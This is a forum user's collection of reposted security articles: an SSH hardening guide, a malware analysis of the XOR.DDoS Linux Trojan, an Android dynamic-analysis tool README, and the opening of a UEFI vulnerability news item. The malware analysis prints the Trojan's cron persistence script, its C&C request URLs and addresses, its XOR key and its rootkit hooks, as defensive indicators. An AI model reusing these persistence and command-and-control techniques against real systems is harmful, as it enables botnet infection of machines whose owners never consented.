Everything posted by Nytro

  1. Secure Secure Shell

2015-01-04 | crypto, nsa, and ssh

You may have heard that the NSA can decrypt SSH at least some of the time. If you have not, then read the latest batch of Snowden documents now. All of it. This post will still be here when you finish. My goal with this post is to make NSA analysts sad.

TL;DR: Scan this post for fixed-width fonts; these are the config file snippets and commands you have to use.

Warning: You will need a recent (2013 or so) OpenSSH version.

The crypto

Reading the documents, I have the feeling that the NSA can 1) decrypt weak crypto and 2) steal keys. Let's focus on the crypto first. SSH supports different key exchange algorithms, ciphers and message authentication codes. The server and the client choose a set of algorithms supported by both, then proceed with the key exchange. Some of the supported algorithms are not so great and should be disabled completely. If you leave them enabled but prefer secure algorithms, a man in the middle might downgrade you to the bad ones. Disabling them hurts interoperability, but everyone uses OpenSSH anyway.

Key exchange

There are basically two ways to do key exchange: Diffie-Hellman and Elliptic Curve Diffie-Hellman. Both provide forward secrecy, which the NSA hates because it rules out passive collection now and key recovery later. The server and the client end up with a shared secret number without a passive eavesdropper learning anything about this number. After we have a shared secret, we have to derive a cryptographic key from it using a key derivation function; in the case of SSH, this is a hash function.

DH works with a multiplicative group of integers modulo a prime. Its security is based on the hardness of the discrete logarithm problem.

    Alice                       Bob
    ---------------------------------------
    Sa = random
    Pa = g^Sa         -->       Pa
                                Sb = random
    Pb                <--       Pb = g^Sb
    s = Pb^Sa                   s = Pa^Sb
    k = KDF(s)                  k = KDF(s)

ECDH works with elliptic curves over finite fields.
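The Alice/Bob exchange above can be sketched in a few lines of Python. This is a toy illustration only: the prime here is a tiny 64-bit value chosen for readability, nowhere near the modulus sizes discussed below, and SHA-256 stands in for SSH's actual key derivation.

```python
import hashlib
import secrets

# Toy Diffie-Hellman mirroring the Alice/Bob diagram above.
# 2^64 - 59 is prime, but FAR too small for real use; demo only.
p = 0xFFFFFFFFFFFFFFC5
g = 2

Sa = secrets.randbelow(p - 2) + 2   # Alice's secret exponent
Sb = secrets.randbelow(p - 2) + 2   # Bob's secret exponent

Pa = pow(g, Sa, p)                  # Alice sends Pa
Pb = pow(g, Sb, p)                  # Bob sends Pb

s_alice = pow(Pb, Sa, p)            # s = Pb^Sa
s_bob   = pow(Pa, Sb, p)            # s = Pa^Sb
assert s_alice == s_bob             # both sides now share s

# k = KDF(s): derive a key by hashing the shared secret
k = hashlib.sha256(str(s_alice).encode()).hexdigest()
print(k)
```

A passive eavesdropper sees only g, p, Pa and Pb; recovering s from those is the discrete logarithm problem.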
Its security is based on the hardness of the elliptic curve discrete logarithm problem.

    Alice                       Bob
    ---------------------------------------
    Sa = random
    Pa = Sa * G       -->       Pa
                                Sb = random
    Pb                <--       Pb = Sb * G
    s = Sa * Pb                 s = Sb * Pa
    k = KDF(s)                  k = KDF(s)

OpenSSH supports 8 key exchange protocols:

    1. curve25519-sha256: ECDH over Curve25519 with SHA2
    2. diffie-hellman-group1-sha1: 1024 bit DH with SHA1
    3. diffie-hellman-group14-sha1: 2048 bit DH with SHA1
    4. diffie-hellman-group-exchange-sha1: Custom DH with SHA1
    5. diffie-hellman-group-exchange-sha256: Custom DH with SHA2
    6. ecdh-sha2-nistp256: ECDH over NIST P-256 with SHA2
    7. ecdh-sha2-nistp384: ECDH over NIST P-384 with SHA2
    8. ecdh-sha2-nistp521: ECDH over NIST P-521 with SHA2

We have to look at 3 things here:

ECDH curve choice: This eliminates 6-8 because NIST curves suck. They leak secrets through timing side channels and off-curve inputs. Also, NIST is considered harmful and cannot be trusted.

Bit size of the DH modulus: This eliminates 2 because the NSA has supercomputers and possibly unknown attacks. 1024 bits simply don't offer a sufficient security margin.

Security of the hash function: This eliminates 2-4 because SHA1 is broken. We don't have to wait for a second preimage attack that takes 10 minutes on a cellphone to disable it right now.

We are left with 1 and 5. 1 is better, and it's perfectly OK to only support that, but for interoperability, 5 can be included.

Recommended /etc/ssh/sshd_config snippet:

    KexAlgorithms curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256

Recommended /etc/ssh/ssh_config snippet:

    Host *
        KexAlgorithms curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256

If you chose to enable 5, open /etc/ssh/moduli if it exists, and delete lines where the 5th column is less than 2000. If it does not exist, create it:

    ssh-keygen -G /tmp/moduli -b 4096
    ssh-keygen -T /etc/ssh/moduli -f /tmp/moduli

This will take a while, so continue while it's running.
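The "delete lines where the 5th column is less than 2000" step can be scripted. A minimal sketch, assuming the standard moduli file layout where the 5th whitespace-separated field is the group size in bits; the sample lines and truncated hex are made up for illustration, and you should run any such filter on a copy before replacing /etc/ssh/moduli:

```python
# Filter OpenSSH moduli lines, keeping only groups of at least
# min_bits (the 5th column), plus comments and blank lines.
def filter_moduli(lines, min_bits=2000):
    kept = []
    for line in lines:
        if line.startswith("#") or not line.strip():
            kept.append(line)           # keep comments/blanks as-is
            continue
        fields = line.split()
        if int(fields[4]) >= min_bits:  # 5th column: modulus size in bits
            kept.append(line)
    return kept

sample = [
    "# time type tests trials size generator modulus",
    "20150104 2 6 100 1023 2 C3A1",    # below 2000 bits: dropped
    "20150104 2 6 100 4095 2 F7B2",    # kept
]
out = filter_moduli(sample)
```

After filtering, `out` retains the comment header and only the 4095-bit group line.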
Authentication

The key exchange ensures that the server and the client share a secret no one else knows. We also have to make sure that they share this secret with each other and not with an NSA analyst.

There are 4 public key algorithms for authentication:

    1. DSA
    2. ECDSA
    3. Ed25519
    4. RSA

Number 2 here involves NIST suckage and should be disabled. Unfortunately, DSA keys must be exactly 1024 bits, so let's disable that as well.

    Protocol 2
    HostKey /etc/ssh/ssh_host_ed25519_key
    HostKey /etc/ssh/ssh_host_rsa_key

This will also disable the horribly broken v1 protocol that you should not have had enabled in the first place. We should remove the unused keys and only generate a large RSA key and an Ed25519 key. Your init scripts may recreate the unused keys; if you don't want that, remove any ssh-keygen commands from the init script.

    cd /etc/ssh
    rm ssh_host_*key*
    ssh-keygen -t ed25519 -f ssh_host_ed25519_key < /dev/null
    ssh-keygen -t rsa -b 4096 -f ssh_host_rsa_key < /dev/null

Generate client keys using the following commands:

    ssh-keygen -t ed25519
    ssh-keygen -t rsa -b 4096

Symmetric ciphers

Symmetric ciphers are used to encrypt the data after the initial key exchange and authentication are complete. Here we have quite a few algorithms:

    1. 3des-cbc
    2. aes128-cbc
    3. aes192-cbc
    4. aes256-cbc
    5. aes128-ctr
    6. aes192-ctr
    7. aes256-ctr
    8. aes128-gcm
    9. aes256-gcm
    10. arcfour
    11. arcfour128
    12. arcfour256
    13. blowfish-cbc
    14. cast128-cbc
    15. chacha20-poly1305

We have to consider the following:

Security of the cipher algorithm: This eliminates 1 and 10-12; both DES and RC4 are broken. Again, no need to wait for them to become even weaker; disable them now.

Key size: At least 128 bits, the more the better.

Block size: Does not apply to stream ciphers. At least 128 bits. This eliminates 13 and 14 because Blowfish and CAST have a 64 bit block size.

Cipher mode: The recommended approach here is to prefer AE modes and optionally allow CTR for compatibility. CTR with Encrypt-then-MAC is provably secure.

This leaves 5-9 and 15.
Chacha20-poly1305 is preferred over AES-GCM because the latter does not encrypt message sizes.

Recommended /etc/ssh/sshd_config snippet:

    Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr

Recommended /etc/ssh/ssh_config snippet:

    Host *
        Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr

Message authentication codes

Encryption provides confidentiality; a message authentication code provides integrity. We need both. If an AE cipher mode is selected, then extra MACs are not used: integrity is already given. If CTR is selected, then we need a MAC to calculate and attach a tag to every message.

There are multiple ways to combine ciphers and MACs; not all of them are useful. The 3 most common:

    Encrypt-then-MAC: encrypt the message, then attach the MAC of the ciphertext.
    MAC-then-encrypt: attach the MAC of the plaintext, then encrypt everything.
    Encrypt-and-MAC: encrypt the message, then attach the MAC of the plaintext.

Only Encrypt-then-MAC should be used, period. MAC-then-encrypt has led to many attacks on TLS, while Encrypt-and-MAC has led to not quite that many attacks on SSH. The reason is that the more you fiddle with an attacker-provided message, the more chances the attacker has to gain information through side channels. With Encrypt-then-MAC, the MAC is verified and, if incorrect, the message is discarded. Boom, one step, no timing channels. With MAC-then-encrypt, the attacker-provided message first has to be decrypted, and only then can you verify it. Decryption failure (due to invalid CBC padding, for example) may take less time than verification failure. Encrypt-and-MAC also has to be decrypted first, leading to the same kind of potential side channels. It's even worse, because no one said that a MAC's output can't leak what its input was. SSH, by default, uses this method.
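The verify-before-decrypt property that makes Encrypt-then-MAC attractive can be shown in a short sketch. This is not SSH's wire format: the "cipher" below is a toy SHA-256 keystream standing in for AES-CTR, and serves only to show that a forged message is rejected in one HMAC comparison before any decryption happens.

```python
import hashlib
import hmac
import secrets

def keystream(key, n):
    # Toy keystream: hash(key || counter), truncated to n bytes.
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(key + counter.to_bytes(8, "big")).digest()
        counter += 1
    return out[:n]

def encrypt_then_mac(enc_key, mac_key, plaintext):
    ct = bytes(a ^ b for a, b in zip(plaintext, keystream(enc_key, len(plaintext))))
    tag = hmac.new(mac_key, ct, hashlib.sha256).digest()  # MAC of the CIPHERTEXT
    return ct + tag

def decrypt(enc_key, mac_key, msg):
    ct, tag = msg[:-32], msg[-32:]
    # Verify first: one constant-time comparison, no decryption of forgeries.
    if not hmac.compare_digest(tag, hmac.new(mac_key, ct, hashlib.sha256).digest()):
        raise ValueError("bad MAC")
    return bytes(a ^ b for a, b in zip(ct, keystream(enc_key, len(ct))))

ek, mk = secrets.token_bytes(32), secrets.token_bytes(32)
msg = encrypt_then_mac(ek, mk, b"ssh payload")
assert decrypt(ek, mk, msg) == b"ssh payload"
```

Flipping a single ciphertext bit makes decrypt() raise before any plaintext is touched, which is exactly the property MAC-then-encrypt and Encrypt-and-MAC lack.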
Here are the available MAC choices:

    1. hmac-md5
    2. hmac-md5-96
    3. hmac-ripemd160
    4. hmac-sha1
    5. hmac-sha1-96
    6. hmac-sha2-256
    7. hmac-sha2-512
    8. umac-64
    9. umac-128
    10. hmac-md5-etm
    11. hmac-md5-96-etm
    12. hmac-ripemd160-etm
    13. hmac-sha1-etm
    14. hmac-sha1-96-etm
    15. hmac-sha2-256-etm
    16. hmac-sha2-512-etm
    17. umac-64-etm
    18. umac-128-etm

The selection considerations:

Security of the hash algorithm: No MD5 and no SHA1. Yes, I know that HMAC-SHA1 does not need collision resistance, but why wait? Disable weak crypto today.

Encrypt-then-MAC only: This eliminates the first half, the ones without -etm. You may be forced to enable non-etm algorithms for some hosts (GitHub). I am not aware of a security proof for CTR-and-HMAC, but I also don't think CTR decryption can fail.

Tag size: At least 128 bits. This eliminates umac-64-etm.

Key size: At least 128 bits. This doesn't eliminate anything at this point.

Recommended /etc/ssh/sshd_config snippet:

    MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-ripemd160-etm@openssh.com,umac-128-etm@openssh.com

Recommended /etc/ssh/ssh_config snippet:

    # GitHub supports neither AE nor Encrypt-then-MAC.
    Host github.com
        MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-ripemd160-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,hmac-ripemd160,umac-128

    Host *
        MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-ripemd160-etm@openssh.com,umac-128-etm@openssh.com

Preventing key theft

Even with forward secrecy, the secret keys must be kept secret. The NSA has a database of stolen keys; you do not want your key there.

System hardening

This post is not intended to be a comprehensive system security guide. Very briefly:

Don't install what you don't need: Every single line of code has a chance of containing a bug. Some of these bugs are security holes. Fewer lines, fewer holes.

Use free software: As in speech. You want to use code that's actually reviewed or that you can review yourself.
There is no way to achieve that without source code. Someone may have reviewed proprietary crap, but who knows.

Keep your software up to date: New versions often fix critical security holes.

Exploit mitigation: Sad but true: there will always be security holes in your software. There are things you can do to prevent their exploitation, such as GCC's -fstack-protector. One of the best security projects out there is Grsecurity. Use it, or use OpenBSD.

Traffic analysis resistance

Set up Tor hidden services for your SSH servers. This has multiple advantages. It provides an additional layer of encryption and server authentication. People looking at your traffic will not know your IP, so they will be unable to scan and target other services running on the same server and client. Attackers can still attack these services, but they won't know whether it has anything to do with the observed traffic until they actually break in. This only holds if you don't disclose your SSH server's fingerprint in any other way.

You should only accept connections from the hidden service or from the LAN, if required. If you don't need LAN access, you can add the following line to /etc/ssh/sshd_config:

    ListenAddress 127.0.0.1:22

Add this to /etc/tor/torrc:

    HiddenServiceDir /var/lib/tor/hidden_service/ssh
    HiddenServicePort 22 127.0.0.1:22

You will find the hostname you have to use in /var/lib/tor/hidden_service/ssh/hostname. You also have to configure the client to use Tor. For this, socat will be needed. Add the following lines to /etc/ssh/ssh_config:

    Host *.onion
        ProxyCommand socat - SOCKS4A:localhost:%h:%p,socksport=9050

    Host *
        ...

If you want to allow connections from the LAN, don't use the ListenAddress line; configure your firewall instead.

Key storage

You should encrypt your client key files using a strong password. Additionally, you can use ssh-keygen -a $number to slow down cracking attempts by iterating the hash function many times.
You may want to store the keys on a pendrive and only plug it in when you want to use SSH. Are you more likely to lose your pendrive or have your system compromised? I don't know.

Unfortunately, you can't encrypt your server key: it must always be available, or else sshd won't start. The only thing protecting it is OS access controls.

The end

It's probably a good idea to test the changes. ssh -v will print the selected algorithms and also makes problems easier to spot. Be extremely careful when configuring SSH on a remote host. Always keep an active session and never restart sshd; instead, send it the SIGHUP signal to reload the configuration without killing your session. You can be even more careful by starting a new sshd instance on a different port and testing that.

Can you make these changes? If the answer is yes, then… If the answer is no, it's probably due to compatibility problems. You can try to convince the other side to upgrade their security and turn it into a yes. If you work for a big company and change management doesn't let you do it, I'm sorry. I've seen the v1 protocol enabled in such places. There is no chance of improvement. Give up to preserve your sanity.

Special thanks to the people of Twitter for the improvements: @ae_g_i_s @AkiTuomi @cryptomilk @eckes @goulaschcowboy @ioerror @jedisct1 @mathandemotion @ThomasJWaldmann @TimelessP

Sursa: https://stribika.github.io/2015/01/04/secure-secure-shell.html
  2. Linux DDoS Trojan hiding itself with an embedded rootkit

Peter Kálnai, January 6th, 2015

At the end of September 2014, a new threat for the Linux operating system, dubbed XOR.DDoS, forming a botnet for distributed denial-of-service attacks, was reported by the MalwareMustDie! group. That post covered the initial intrusion over SSH, the static properties of the related Linux executable, and the encryption methods used. Later, we realized that the installation process is customized to the victim's Linux environment so that an additional rootkit component can be run. In this blog post, we will describe the installation steps, the rootkit itself, and the communication protocol for getting attack commands.

Installation Script & Infection Vector

The infection starts with an attempt to brute force the SSH login credentials of the root user. If successful, attackers gain access to the compromised machine and install the Trojan, usually via a shell script. The script contains procedures like main, check, compiler, uncompress, setup, generate, upload, checkbuild, etc. and variables like __host_32__, __host_64__, __kernel__, __remote__, etc. The main procedure decrypts and selects the C&C server based on the architecture of the system.

In the requests below, the iid parameter is the MD5 hash of the name of the kernel version. The script first lists all the modules running on the current system with the command lsmod. Then it takes the last one and extracts its name and the vermagic parameter. In one of our cases, the testing environment ran under "3.8.0-19-generic\ SMP\ mod_unload\ modversions\ 686\ ", which has an MD5 hash equal to CE74BF62ACFE944B2167248DD0674977. Three GET requests are issued to the C&C.
The first one is performed by the check procedure (note the original misspelling):

    request: GET /check?iid=CE74BF62ACFE944B2167248DD0674977&kernel=3.8.0
    reply:   1001|CE74BF62ACFE944B2167248DD0674977|header directory is exists!

Then the compiler procedure issues another GET request, passing parameters like C&C servers, version info, etc. to the server, where they are compiled into a newly created executable:

    request: GET /compiler?iid=CE74BF62ACFE944B2167248DD0674977&username=admin
             &password=admin&ip=103.25.9.245:8005%7C103.240.141.50:8005%7C
             66.102.253.30:8005%7Cndns.dsaj2a1.org:8005%7Cndns.dsaj2a.org:8005%7C
             ndns.hcxiaoao.com:8005%7Cndns.dsaj2a.com:8005
             &ver=3.8.0-19-generic%5C%20SMP%5C%20mod_unload%5C%20modversions%5C%20686%5C%20
             &kernel=3.8.0
    reply:   1001|CE74BF62ACFE944B2167248DD0674977|header directory is exists!

Finally, the third GET request downloads the customized version of the Trojan's binary in the form of a gzip archive, which is unpacked and executed:

    request: GET /upload/module/CE74BF62ACFE944B2167248DD0674977/build.tgz
    reply:   1001|CE74BF62ACFE944B2167248DD0674977|create ok

The previous steps run only if there already is a built version for the current kernel version on the server side. If not, the script locates the kernel headers in the /lib/modules/%s/build/ directory, where %s is the return value of the command uname -r, then packs all the files and uploads them to the C&C server using a custom uploader called mini. The steps of the first scenario then follow.

The rootkit component is a loadable kernel module (LKM). To install it successfully on a system, the vermagic value of the LKM needs to agree with the version of the kernel headers installed on the user's system. That is the motivation behind the previous installation steps.
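The iid parameter in the requests above is just the MD5 hex digest of the vermagic string. A minimal sketch of that computation follows; note that the exact byte-level escaping of the vermagic string as hashed by the script is an assumption here, so only the shape of the identifier is checked, not its value.

```python
import hashlib

# Reconstructing the bot's victim identifier: MD5 of the kernel
# vermagic string. The exact escaping below is an assumption.
vermagic = r"3.8.0-19-generic\ SMP\ mod_unload\ modversions\ 686\ "
iid = hashlib.md5(vermagic.encode()).hexdigest().upper()
print(iid)  # a 32-character uppercase hex identifier, as seen in the GETs
```

Such a scheme lets the C&C key its prebuilt-module cache on the kernel flavour alone, which is why the same iid appears in all three requests.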
If the previous sequences fail, the script installs the Trojan without the rootkit component.

Structure & Persistence

The binary structure of the main executable is as follows:

The persistence of the Trojan is achieved in multiple ways. First, it is installed into the /boot/ directory under a random 10-character name. Then a script with the same name as the Trojan is created in the /etc/init.d directory, together with five symbolic links pointing to it, created as /etc/rc%u.d/S90%s, where %u runs from 1 to 5 and %s is substituted with the random name. Moreover, a script /etc/cron.hourly/cron.sh is added with the content:

    #!/bin/sh
    PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
    for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done
    cp /lib/udev/udev /lib/udev/debug
    /lib/udev/debug

The line "*/3 * * * * root /etc/cron.hourly/cron.sh" is inserted into the crontab.

The functionality of the main executable lies in three infinite loops responsible for:

    1. downloading and executing instructions in the bot's configuration file,
    2. reinstalling itself as the /lib/udev/udev file, and
    3. performing flooding commands.

The configuration file contains four categories of lists: md5, denyip, filename and rmfile. These mean, respectively: kill a running process based on its CRC checksum; kill a process with active communication to an IP from the list; kill a process based on its filename; and remove a file with the specified name. In the next figure, a fragment of the config file is displayed (known filenames connected with competing flooding Trojans are highlighted):

Lists of processes to kill or remove before its own installation are typical for flooding Trojans. We also have to note that there is a variant of this Trojan compiled for the ARM architecture.
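The persistence layout described above (random 10-character name in /boot/, a matching init script, and S90 symlinks for runlevels 1 through 5) can be sketched by expanding the article's %u/%s format strings. This is a reconstruction for defenders hunting such artifacts, not the malware's own code:

```python
import random
import string

# Expand the /etc/rc%u.d/S90%s pattern from the article, with a
# random 10-character name as the Trojan uses.
name = "".join(random.choice(string.ascii_lowercase) for _ in range(10))

paths = ["/boot/" + name, "/etc/init.d/" + name]
paths += ["/etc/rc%u.d/S90%s" % (u, name) for u in range(1, 6)]

for p in paths:
    print(p)
```

A scanner can invert this: any S90-prefixed rc symlink whose target is a 10-character random-looking name in /etc/init.d is worth a closer look.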
This suggests that the list of potentially infected systems (besides 32-bit and 64-bit Linux web servers and desktops) extends to routers, Internet of Things devices, NAS storage and 32-bit ARM servers (however, this has not been observed in the wild yet). It contains an additional implementation of the download-and-execute feature in an infinite loop called daemondown:

A few days ago, a new 32-bit variant of this Trojan with a few modifications was observed. The bot is installed as /lib/libgcc4.so; the unique file containing its identification string (see later) is /var/run/udev.pid; the initialization script is /etc/cron.hourly/udev.sh; and the rootkit features are completely omitted. The presence of any of these files can serve as an indicator of compromise (IoC).

LKM Rootkit

Trojans for the Windows platform have used various rootkit features for a very long time. It is known that some trojanized flooding tools had a Windows variant utilizing the Agony rootkit (its source code has been publicly available since 2006). We presented research related to these malicious DDoS tools at Botconf 2014 in a survey called Chinese Chicken: Multiplatform DDoS Botnets. Now there is a flooding Trojan for Linux that also contains an embedded rootkit. Its main functionality is to hide various aspects of the Trojan's activity, and it is provided by procedures in the switch table:

The Trojan running in userspace requests these features from the rootkit in the kernel via an ioctl command with a specific code (0x9748712). The presence of the rootkit is first checked by opening a process with the name rs_dev:

The request itself needs two parameters: one specifies the number of the command to be performed by the rootkit, and the other is the number of the port to be hidden.
Below is an example of how the Trojan hides the TCP port (notice the task value 3):

Based on the procedure names, it is likely that the malware authors were inspired by the open source project called Suterusu to build their rootkit. The Trojan from last year called Hand of Thief failed in its ambition to be the first banking Trojan for Linux desktops. It also borrowed part of its code from an existing open source project, namely its methods of process injection. The description of the Suterusu project says "An LKM rootkit targeting Linux 2.6/3.x on x86(_64), and ARM". Another article related to Suterusu was published in January 2013.

C&C communication

The communication is encrypted in both directions with the same hard-coded XOR key (BB2FA36AAA9541F0) as the configuration file. An additional file, /var/run/sftp.pid, containing a unique magic string of length 32 bytes, is stored and used as a unique identifier of the victim's machine within the communication. There is a list of C&C commands for which the bot listens: start flooding, stop flooding, download-and-execute, self-update, send the MD5 hash of its memory, and get the list of processes to kill:

The list of C&Cs is stored in the shell script in the __remote__ variable. The Trojan first sends information about the running system to the C&C server (very likely to be displayed on a panel for the botnet operator). The replies usually arrive in the form of a command. The header of a command is 0x1C bytes long and is stored in a structure called Header. The first command is to stop any flooding attack, and the next one is to start flooding with the list of hosts provided. The entries of the Header are shown below. The highlighted parameters are the total size of the command (Size, 0x102C), the task number (Order, 0x3, i.e. _cmd_start in the switch table), and the number of flooding tasks (Task_Num, 0xF):

The rest of the flooding command contains an encrypted structure with the attack tasks.
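Because the C&C traffic and the config file are protected with the repeating hard-coded XOR key quoted above, decryption is trivial once the key is known: applying the same routine twice returns the original bytes. A minimal sketch (the sample plaintext is ours, for illustration):

```python
# Repeating-key XOR with the Trojan's hard-coded key. XOR is its own
# inverse, so this one routine both encrypts and decrypts.
KEY = b"BB2FA36AAA9541F0"

def xor_crypt(data, key=KEY):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

blob = xor_crypt(b"ndns.dsaj2a.org:8005")       # "encrypt" a sample string
assert xor_crypt(blob) == b"ndns.dsaj2a.org:8005"  # applying it again decrypts
```

This is also why the family is called XOR.DDoS: any captured config or C&C blob can be recovered offline with this one key.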
After decryption, we can see the IP address (red) and ports (green) which will be flooded by the Trojan, together with other parameters of the DDoS attack (e.g. the grey value selects the type of attack: SYN/DNS).

Acknowledgement

Thanks to my colleague, Jaromír Hořejší, for cooperation on this analysis. Pop-art was created by the independent digital artist Veronika Begánová.

Sources

Here are the samples connected with the analysis:

    Install script
        SHA256: BA84C056FB4541FE26CB0E10BC6A075585990F3CE3CDE2B49475022AD5254E5B
        Detection: BV:Xorddos-B [Trj]
    Xorddos Uploader
        SHA256: 44153031700A019E8F9E434107E4706A705F032898D3A9819C4909B2AF634F18
        Detection: ELF:Xorddos-J [Trj]
    Xorddos Trojan for EM_386
        SHA256: AD26ABC8CD8770CA4ECC7ED20F37B510E827E7521733ECAEB3981BF2E4A96FBF
        Detection: ELF:Xorddos-A [Trj]
    Xorddos Trojan for EM_x86_64
        SHA256: 859A952FF05806C9E0652A9BA18D521E57090D4E3ED3BEF07442E42CA1DF04B6
        Detection: ELF:Xorddos-A [Trj]
    Xorddos Rootkit
        SHA256: 6BE322CD81EBC60CFEEAC2896B26EF015D975AD3DDA95AE63C4C7A28B7809029
        Detection: ELF:Xorddos-D [Rtk]
    Xorddos Trojan for EM_ARM
        SHA256: 49963D925701FE5C7797A728A044F09562CA19EDD157733BC10A6EFD43356EA0
        Detection: ELF:Xorddos-I [Trj]
    Xorddos Trojan no rootkit
        SHA256: 24B9DB26B4335FC7D8A230F04F49F87B1F20D1E60C2FE6A12C70070BF8427AFF
        Detection: ELF:Xorddos-K [Trj]

Sursa: https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/
  3. Hooker: Automated Dynamic Analysis of Android Applications

About Hooker

Functional Description

Hooker is an open source project for dynamic analysis of Android applications. The project provides various tools and applications that can be used to automatically intercept and modify any API call made by a targeted application. It leverages the Android Substrate framework to intercept these calls and aggregate all their contextual information (parameters, returned values, ...). Collected information can be stored either in a distributed database (e.g. ElasticSearch) or in JSON files. A set of Python scripts is also provided to automate the execution of an analysis and to collect any API calls made by a set of applications.

Technical Description

Hooker is made of multiple modules:

    APK-instrumenter is an Android application that must be installed on an Android device (for instance, an emulator) prior to the analysis.
    hooker_xp is a Python tool that can be used to control the Android device and trigger the installation and stimulation of an application on it.
    hooker_analysis is a Python script that can be used to collect results stored in the ElasticSearch database.
    tools/APK-contactGenerator is an Android application that is automatically installed on the Android device by hooker_xp to inject fake contact information.
    tools/apk_retriever is a Python tool that can be used to download APKs from various public online Android markets.
    tools/emulatorCreator is a script that can be used to prepare an emulator. You'll have to edit this script in order to specify your SDK home and related settings.
More Information

    Website: https://github.com/AndroidHooker/hooker
    FAQ: available here
    Bug Tracker: bugs and feature requests are tracked in GitHub Issues
    Email: android-hooker@amossys.fr
    Twitter: follow the authors' accounts (@Tibapbedoum and @Lapeluche)

Getting Started

We developed Hooker on our Debian 64-bit computers, so it may fail to execute properly on other systems due to improper paths or parameters. Your help in identifying these incompatibilities is highly appreciated. Please report an issue in our Bug Tracker if you encounter any errors while using it.

In order to use Hooker, you need at least one server on which you've installed:

    Python 2.7,
    elasticsearch 1.1.1,
    Android SDK API 16 (Android 4.1.2),
    androguard 1.9.

Setup your ElasticSearch Host

This step covers the elasticsearch installation. Please download elasticsearch and follow its online documentation (Elasticsearch.org Download ELK | Elasticsearch). You can either install elasticsearch on a single host or deploy a cluster of elasticsearch nodes.

Setup Android SDK

You can download the Android bundle here: Download Android Studio and SDK Tools | Android Developers. If you want to use the Hooker install script, you have to:

    Make sure your ANDROID_HOME environment variable is set:

        $ export ANDROID_HOME=/path/to/your/sdk/folder

    Download the SDK APIs from your SDK manager (Hooker has been tested with API 16, but should work with more recent versions).

Build your reference Android Virtual Device (AVD)

Create a new AVD from scratch.
If you want to match our setup, choose the following parameters:

    Nexus One,
    Target: Android 4.1.2,
    Memory option: 512 MB,
    Internal Storage: 500 MB,
    SDCard: 500 MB (you must have SDCard storage if you want Hooker to work properly),
    Enable snapshot.

Then:

    Launch your new AVD with "Save to snapshot" checked,
    Run the script tools/emulatorCreator/prepareEmulator.sh to install and prepare your emulator,
    In the Android system: disable lockscreen security (Menu > System Settings > Security > Screen lock > None); open the superuser app, validate Okay and quit; open the Substrate app, click "Link Substrate Files", allow Substrate, and click "Link Substrate Files" again, then click "Restart System (Soft)",
    Wait for the system to start properly and close the emulator.

Your reference AVD is now ready!

Configure the host where Hooker is executed

If your elasticsearch host is on a different host than your Android emulator, you will need to redirect traffic through the network. To do this, you can use socat:

    $ socat -s -v TCP4-LISTEN:9200,fork,ignoreeof,reuseaddr TCP4:192.168.98.11:9200,ignoreeof

If you get an error concerning OpenGLES emulation ("Could not load OpenGLES emulation library"), you have to edit your ldconfig (as root):

    # echo "/path/to/your/sdk/tools/lib" > /etc/ld.so.conf.d/android.conf
    # ldconfig

Play HOOKER

Playing with real devices

If you want to use Hooker on real devices, please first read the specific README.

Installation

An install script is provided to help you build and install all the necessary dependencies.
If you want to use this script, make sure you have the following dependencies: openjdk-6-jdk, ant and python-setuptools (just apt install them). When you are all set, run the install script in the Hooker root directory:

    $ ./install.sh

You then need to install the APK-instrumenter application on your reference AVD:

    Launch your new AVD with the "Save to snapshot" option checked,
    Install the application using adb:

        $ $ANDROID_HOME/platform-tools/adb install APK-instrumenter/bin/ApkInstrumenterActivity-debug.apk

    When the application is installed, open the Substrate app and click "Restart System (Soft)". You can then close your AVD.

Setup your configuration file

    If you want to make a manual analysis, copy the file hooker_xp/sampleManualAnalysis.conf,
    If you want to make an automatic analysis, copy the file hooker_xp/sampleAutomaticAnalysis.conf,
    If you want to make an analysis on real devices, copy one of the *RealDevice* configuration files.

Depending on your system configuration, customize the parameters declared in the retained configuration file. The sample configuration files are heavily commented, so please read the comments. Following the previous steps, you need to specify the path to the reference AVD you just built. As the comments explain, just put the path plus the name of the AVD, i.e. without the .avd extension.

Run your Experiment

The experiment script is in the hooker_xp directory:

    $ cd hooker_xp && python hooker_xp.py -c yourAnalysisConfigurationFile.conf

Python logs will explain what is going on.

Contributing

We would be delighted if you could help us improve this work. Please use GitHub features to provide your bugfixes and improvements.

Authors and Sponsors

The Hooker project was initiated by Georges Bossert and Dimitri Kirchner. Both work for AMOSSYS, a French IT security company: http://www.amossys.fr.

License

This software is licensed under the GPLv3 License. See the LICENSE file in the top distribution directory for the full license text.
Sursa: https://github.com/AndroidHooker/hooker
  4. Researchers Find Several UEFI Vulnerabilities

By Eduard Kovacs, January 06, 2015

The Carnegie Mellon University CERT Coordination Center warned on Monday that serious vulnerabilities exist in the Unified Extensible Firmware Interface (UEFI), the BIOS replacement designed for improved software interoperability. The organization has published three separate advisories for security holes identified by researchers Rafal Wojtczuk of Bromium and Corey Kallenberg of The MITRE Corporation. The experts disclosed the UEFI vulnerabilities in a presentation at the Chaos Communication Congress (CCC) in Germany in late December.

The first flaw identified by the experts, CVE-2014-8274, can be exploited by a local, authenticated attacker to bypass firmware write protections. According to the researchers, the issue exists because access to the boot script used by the EFI S3 Resume Boot Path is not properly restricted.

"An authenticated local attacker may be able to bypass Secure Boot and/or perform an arbitrary reflash of the platform firmware despite the presence of signed firmware update enforcement. Additionally, the attacker could arbitrarily read or write to the SMRAM region. Lastly, the attacker could corrupt the platform firmware and cause the system to become inoperable," CERT/CC noted in its advisory.

